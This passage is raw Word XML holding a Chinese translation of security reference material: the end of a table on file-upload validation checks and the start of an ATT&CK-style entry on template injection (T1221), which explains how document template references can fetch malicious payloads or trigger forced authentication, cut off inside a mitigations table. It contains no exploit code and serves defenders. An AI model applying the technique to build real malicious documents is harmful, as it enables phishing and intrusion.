      <w:tr w:rsidR="009917C2" w:rsidRPr="00671A0D" w14:paraId="335D44D3" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0390CAD6" w14:textId="738BE5C0" w:rsidR="009917C2" w:rsidRPr="00671A0D" w:rsidRDefault="009917C2" w:rsidP="009917C2">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>getimagesize()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54D96750" w14:textId="58F9FEAB" w:rsidR="009917C2" w:rsidRPr="00671A0D" w:rsidRDefault="009917C2" w:rsidP="009917C2">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">getimagesize() </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>函数</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将检查它是否是一个图像，并将检查</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>mime \</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>”以验证图像类型。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009917C2" w:rsidRPr="00671A0D" w14:paraId="58813505" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C26278C" w14:textId="70553B27" w:rsidR="009917C2" w:rsidRPr="00671A0D" w:rsidRDefault="009917C2" w:rsidP="009917C2">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">\"Content-Type\" </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>标题验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EC7F7FA" w14:textId="3330815B" w:rsidR="009917C2" w:rsidRPr="00671A0D" w:rsidRDefault="009917C2" w:rsidP="00880EAA">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Content-Type \</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>“实体在请求标题中表示消息内容的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Internet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>媒体类型。有时</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序使用此参数以将文件识别为有效文件。例如，它们只接受文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>text / plain \</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>”的“</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Content-Type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>”。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009917C2" w:rsidRPr="00671A0D" w14:paraId="3D22464D" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60B0AD15" w14:textId="5083A1D3" w:rsidR="009917C2" w:rsidRDefault="00880EAA" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用文件类型检测器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74ECD7DE" w14:textId="64E402D4" w:rsidR="009917C2" w:rsidRDefault="00880EAA" w:rsidP="00880EAA">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有时，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序有意或无意地使用某些函数（或</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）来检查文件类型，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>例如，当应用程序调整图像文件大小时，它可能只在上载非图像文件时显示错误消息而不将其保存在服务器上。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67F711E1" w14:textId="77777777" w:rsidR="001C4867" w:rsidRDefault="001C4867" w:rsidP="009917C2"/>
    <w:p w14:paraId="29B16EF6" w14:textId="77777777" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00E27914">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2B9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模板注入</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E27914" w14:paraId="213B6B4F" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16FA8B6B" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> T1221</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24C33641" w14:textId="4135556C" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003A640F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初始</w:t>
            </w:r>
            <w:r>
              <w:t>访问，</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70051FCC" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FA1BA31" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A709EA0" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>杀毒软件，邮件网关，网络入侵检测系统，</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D823C23" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>静态文件分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6849E6A6" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t>: Patrick Campbell, @pjcampbe11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="762269A2" w14:textId="77777777" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> 1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F90681F" w14:textId="77777777" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00E27914"/>
    <w:p w14:paraId="61F776D4" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00CB09B6" w:rsidRDefault="00E27914" w:rsidP="00E27914">
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Office XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OOXML</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）规范为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xlsx</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.pptx</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）定义了基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的格式，以替换较旧的二进制格式</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.doc</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.xls</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.ppt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OOXML </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件被打包在一起的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ZIP </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存档中，这些存档受到各种</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件（称为部件）的影响，其中包含共同定义文档呈现方式的属性。</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="4F7CAC"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>[1]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D968FBC" w14:textId="77777777" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00E27914">
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部件内的属性可能引用通过联机</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB09B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问的共享公共资源。例如，模板属性引用文件，作为预格式化的文档蓝图，在加载文档时获取该文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44150EA4" w14:textId="77777777" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00E27914">
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会滥用此技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在一开始</w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐藏要通过文档（即</w:t>
      </w:r>
      <w:r w:rsidRPr="00F368E9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）执行的恶意代码。注入到文档中的模板引用可能允许在加载文档时提取和执行恶意负载。这些文件可以通过其他技术（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F368E9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:r w:rsidRPr="00F368E9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>附件</w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00F368E9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>污点共享内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）传递，并且可能会避开静态检测，因为在获取恶意有效负载之前，不存在典型的指标（</w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VBA </w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宏、脚本等）。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外面</w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已看到一些示例，其中模板注入用于加载包含漏洞的恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DF806B" w14:textId="77777777" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00E27914">
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此技术还可以通过注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB/HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（或其他凭据提示）</w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并触发身份验证尝试来启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F368E9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强制身份验证</w:t>
      </w:r>
      <w:r w:rsidRPr="00364D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E76B7" w14:textId="77777777" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00E27914">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2524"/>
        <w:gridCol w:w="7212"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E27914" w:rsidRPr="00D12CC9" w14:paraId="18FCB2F3" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="182D2F69" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00D12CC9" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="18809C66" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00D12CC9" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E27914" w:rsidRPr="00F368E9" w14:paraId="494E5271" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3169C91A" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00CC5590" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidR="00E27914" w:rsidRPr="00F368E9">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>杀毒软件</w:t>
              </w:r>
              <w:r w:rsidR="00E27914" w:rsidRPr="00F368E9">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidR="00E27914" w:rsidRPr="00F368E9">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
